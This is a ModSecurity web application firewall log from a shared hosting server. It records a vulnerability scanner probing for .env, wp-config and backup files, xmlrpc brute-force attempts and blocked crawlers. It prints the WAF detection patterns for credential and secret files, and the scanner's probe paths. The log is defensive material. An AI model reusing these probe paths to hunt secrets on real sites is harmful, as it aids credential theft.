[Tue May 26 14:04:43.397059 2026] [security2:error] [pid 578581:tid 578781] [client 45.148.10.62:44384] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env"] [unique_id "ahVbI5m_8al1sb-umPt-nAAAAEY"]
[Tue May 26 14:04:43.750844 2026] [security2:error] [pid 578581:tid 578755] [client 45.148.10.62:44396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env.bak"] [unique_id "ahVbI5m_8al1sb-umPt-pwAAACw"]
[Tue May 26 14:04:43.952943 2026] [security2:error] [pid 578581:tid 578727] [client 45.148.10.62:44396] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbI5m_8al1sb-umPt-xwAAABA"]
[Tue May 26 14:04:44.130848 2026] [security2:error] [pid 578581:tid 578813] [client 45.148.10.62:44396] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJJm_8al1sb-umPt-zgAAAGY"]
[Tue May 26 14:04:44.173536 2026] [security2:error] [pid 578581:tid 578724] [client 45.148.10.62:44384] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbI5m_8al1sb-umPt-ogAAAA0"]
[Tue May 26 14:04:44.293253 2026] [security2:error] [pid 578581:tid 578766] [client 45.148.10.62:44396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/backend/.env"] [unique_id "ahVbJJm_8al1sb-umPt-2gAAADc"]
[Tue May 26 14:04:44.398200 2026] [security2:error] [pid 578581:tid 578787] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbI5m_8al1sb-umPt-zQAAAEw"]
[Tue May 26 14:04:44.496016 2026] [security2:error] [pid 578581:tid 578808] [client 45.148.10.62:44396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/test.php"] [unique_id "ahVbJJm_8al1sb-umPt-5AAAAGE"]
[Tue May 26 14:04:44.683163 2026] [security2:error] [pid 578581:tid 578749] [client 45.148.10.62:44388] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJJm_8al1sb-umPt-6AAAACY"]
[Tue May 26 14:04:44.830375 2026] [security2:error] [pid 578581:tid 578754] [client 45.148.10.62:44388] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env.backup"] [unique_id "ahVbJJm_8al1sb-umPt-7AAAACs"]
[Tue May 26 14:04:44.996357 2026] [security2:error] [pid 578581:tid 578816] [client 45.148.10.62:44388] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env.orig"] [unique_id "ahVbJJm_8al1sb-umPt-9QAAAGk"]
[Tue May 26 14:04:45.142372 2026] [security2:error] [pid 578581:tid 578728] [client 45.148.10.62:44388] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env.old"] [unique_id "ahVbJZm_8al1sb-umPt_AgAAABE"]
[Tue May 26 14:04:45.321308 2026] [security2:error] [pid 578581:tid 578781] [client 45.148.10.62:44388] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJZm_8al1sb-umPt_BgAAAEY"]
[Tue May 26 14:04:45.466999 2026] [security2:error] [pid 578581:tid 578833] [client 45.148.10.62:44388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/.env.php.bak"] [unique_id "ahVbJZm_8al1sb-umPt_CAAAAHo"]
[Tue May 26 14:04:45.618311 2026] [security2:error] [pid 578581:tid 578717] [client 45.148.10.62:44384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/.env.php"] [unique_id "ahVbJZm_8al1sb-umPt_DAAAAAY"]
[Tue May 26 14:04:45.800545 2026] [security2:error] [pid 578581:tid 578782] [client 45.148.10.62:44398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJZm_8al1sb-umPt_FQAAAEc"]
[Tue May 26 14:04:45.990113 2026] [security2:error] [pid 578581:tid 578723] [client 45.148.10.62:44398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJZm_8al1sb-umPt_IAAAAAw"]
[Tue May 26 14:04:46.179760 2026] [security2:error] [pid 578581:tid 578821] [client 45.148.10.62:44398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJpm_8al1sb-umPt_JgAAAG4"]
[Tue May 26 14:04:46.312809 2026] [security2:error] [pid 578581:tid 578797] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbJZm_8al1sb-umPt_HgAAAFY"]
[Tue May 26 14:04:46.363165 2026] [security2:error] [pid 578581:tid 578761] [client 45.148.10.62:44398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJpm_8al1sb-umPt_KgAAADI"]
[Tue May 26 14:04:46.569039 2026] [security2:error] [pid 578581:tid 578770] [client 45.148.10.62:44398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJpm_8al1sb-umPt_LgAAADs"]
[Tue May 26 14:04:46.758317 2026] [security2:error] [pid 578581:tid 578826] [client 45.148.10.62:44398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJpm_8al1sb-umPt_NQAAAHM"]
[Tue May 26 14:04:46.908305 2026] [security2:error] [pid 578581:tid 578817] [client 45.148.10.62:44398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/wp-config.php"] [unique_id "ahVbJpm_8al1sb-umPt_PwAAAGo"]
[Tue May 26 14:04:47.422807 2026] [security2:error] [pid 578581:tid 578779] [client 45.148.10.62:51854] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.ndequipments.com"] [uri "/wp-config.php.old"] [unique_id "ahVbJ5m_8al1sb-umPt_SQAAAEQ"]
[Tue May 26 14:04:47.935973 2026] [security2:error] [pid 578581:tid 578765] [client 45.148.10.62:51858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/config.php"] [unique_id "ahVbJ5m_8al1sb-umPt_YAAAADY"]
[Tue May 26 14:04:48.134217 2026] [security2:error] [pid 578581:tid 578793] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbJ5m_8al1sb-umPt_WwAAAFI"]
[Tue May 26 14:04:48.419824 2026] [security2:error] [pid 578581:tid 578748] [client 45.148.10.62:51864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/config.php.bak"] [unique_id "ahVbKJm_8al1sb-umPt_cAAAACU"]
[Tue May 26 14:04:48.500579 2026] [security2:error] [pid 578581:tid 578817] [client 85.208.96.194:38576] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-23rd/day/2023-02-19/"] [unique_id "ahVbKJm_8al1sb-umPt_dwAAAGo"]
[Tue May 26 14:04:48.500725 2026] [security2:error] [pid 578581:tid 578817] [client 85.208.96.194:38576] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-23rd/day/2023-02-19/"] [unique_id "ahVbKJm_8al1sb-umPt_dwAAAGo"]
[Tue May 26 14:04:48.536009 2026] [security2:error] [pid 578581:tid 578770] [client 123.20.212.192:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbKJm_8al1sb-umPt_YwAAADs"]
[Tue May 26 14:04:48.637803 2026] [security2:error] [pid 578581:tid 578728] [client 91.169.4.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbKJm_8al1sb-umPt_ZgAAABE"]
[Tue May 26 14:04:48.940286 2026] [security2:error] [pid 578581:tid 578823] [client 45.148.10.62:51866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbKJm_8al1sb-umPt_ewAAAHA"]
[Tue May 26 14:04:49.244544 2026] [security2:error] [pid 578581:tid 578787] [client 45.148.10.62:51866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbKZm_8al1sb-umPt_jwAAAEw"]
[Tue May 26 14:04:49.424645 2026] [security2:error] [pid 578581:tid 578802] [client 45.148.10.62:51866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbKZm_8al1sb-umPt_lwAAAFs"]
[Tue May 26 14:04:49.570007 2026] [security2:error] [pid 578581:tid 578718] [client 45.148.10.62:51866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/phpinfo.php"] [unique_id "ahVbKZm_8al1sb-umPt_nQAAAAc"]
[Tue May 26 14:04:50.022305 2026] [security2:error] [pid 578581:tid 578818] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbKZm_8al1sb-umPt_oAAAAGs"]
[Tue May 26 14:04:51.295568 2026] [security2:error] [pid 578581:tid 578751] [client 202.141.30.10:65474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbK5m_8al1sb-umPt_1AAAACg"]
[Tue May 26 14:04:51.295681 2026] [security2:error] [pid 578581:tid 578751] [client 202.141.30.10:65474] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbK5m_8al1sb-umPt_1AAAACg"]
[Tue May 26 14:04:51.790658 2026] [security2:error] [pid 578581:tid 578830] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbK5m_8al1sb-umPt_1wAAAHc"]
[Tue May 26 14:04:53.801190 2026] [security2:error] [pid 578581:tid 578838] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbLZm_8al1sb-umPuAHgAAAH8"]
[Tue May 26 14:04:54.468329 2026] [security2:error] [pid 578581:tid 578691] [remote 74.7.241.58:35166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVbLpm_8al1sb-umPuAOgAAb20"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/the-events-calendar/common/src/Common/Site_Health
[Tue May 26 14:04:55.222501 2026] [security2:error] [pid 578581:tid 578768] [client 74.7.230.31:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVbLpm_8al1sb-umPuAQQAAADk"]
[Tue May 26 14:04:55.222535 2026] [security2:error] [pid 578581:tid 578768] [client 74.7.230.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVbLpm_8al1sb-umPuAQQAAADk"]
[Tue May 26 14:04:55.222982 2026] [security2:error] [pid 578581:tid 578760] [client 74.7.230.31:58176] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahVbLpm_8al1sb-umPuAPwAAADE"]
[Tue May 26 14:04:55.632155 2026] [security2:error] [pid 578581:tid 578800] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbL5m_8al1sb-umPuATwAAAFk"]
[Tue May 26 14:04:57.382901 2026] [security2:error] [pid 578581:tid 578750] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbMJm_8al1sb-umPuAigAAACc"]
[Tue May 26 14:04:59.202703 2026] [security2:error] [pid 578581:tid 578739] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbMpm_8al1sb-umPuAvQAAABw"]
[Tue May 26 14:05:00.992769 2026] [security2:error] [pid 578581:tid 578720] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbNJm_8al1sb-umPuBFAAAAAk"]
[Tue May 26 14:05:02.180055 2026] [security2:error] [pid 578581:tid 578800] [client 202.141.30.10:65386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbNpm_8al1sb-umPuBUQAAAFk"]
[Tue May 26 14:05:02.180586 2026] [security2:error] [pid 578581:tid 578800] [client 202.141.30.10:65386] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbNpm_8al1sb-umPuBUQAAAFk"]
[Tue May 26 14:05:03.279360 2026] [security2:error] [pid 578581:tid 578814] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbNpm_8al1sb-umPuBbAAAAGc"]
[Tue May 26 14:05:04.015659 2026] [security2:error] [pid 578581:tid 578793] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbN5m_8al1sb-umPuBggAAAFI"]
[Tue May 26 14:05:06.429366 2026] [security2:error] [pid 578581:tid 578793] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbOZm_8al1sb-umPuBxwAAAFI"]
[Tue May 26 14:05:07.633902 2026] [security2:error] [pid 578581:tid 578739] [client 14.249.29.2:48210] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahVbO5m_8al1sb-umPuB8wAAABw"]
[Tue May 26 14:05:07.633945 2026] [security2:error] [pid 578581:tid 578739] [client 14.249.29.2:48210] ModSecurity: Access denied with code 409 (phase 2). Match of "eq 1" against "&REQUEST_COOKIES:humans_21909" required. [file "/opt/mod_security/hg_rules.conf"] [line "1552"] [id "900424"] [msg "Transparent Bot Detection for Contact Forms"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahVbO5m_8al1sb-umPuB8wAAABw"]
[Tue May 26 14:05:07.741565 2026] [security2:error] [pid 578581:tid 578780] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbO5m_8al1sb-umPuB8gAAAEU"]
[Tue May 26 14:05:10.063437 2026] [security2:error] [pid 578581:tid 578807] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbPZm_8al1sb-umPuCOgAAAGA"]
[Tue May 26 14:05:11.496892 2026] [security2:error] [pid 578581:tid 578820] [client 106.217.75.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbP5m_8al1sb-umPuCXAAAAG0"]
[Tue May 26 14:05:12.116496 2026] [security2:error] [pid 578581:tid 578823] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbP5m_8al1sb-umPuCeQAAAHA"]
[Tue May 26 14:05:13.066537 2026] [security2:error] [pid 578581:tid 578723] [client 202.141.30.10:65425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbQJm_8al1sb-umPuCpwAAAAw"]
[Tue May 26 14:05:13.066718 2026] [security2:error] [pid 578581:tid 578723] [client 202.141.30.10:65425] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbQJm_8al1sb-umPuCpwAAAAw"]
[Tue May 26 14:05:13.248176 2026] [security2:error] [pid 578581:tid 578758] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbQJm_8al1sb-umPuCowAAAC8"]
[Tue May 26 14:05:15.282824 2026] [security2:error] [pid 578581:tid 578835] [client 104.28.68.80:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbQ5m_8al1sb-umPuC4gAAAHw"]
[Tue May 26 14:05:15.829513 2026] [security2:error] [pid 578581:tid 578752] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbQ5m_8al1sb-umPuC8QAAACk"]
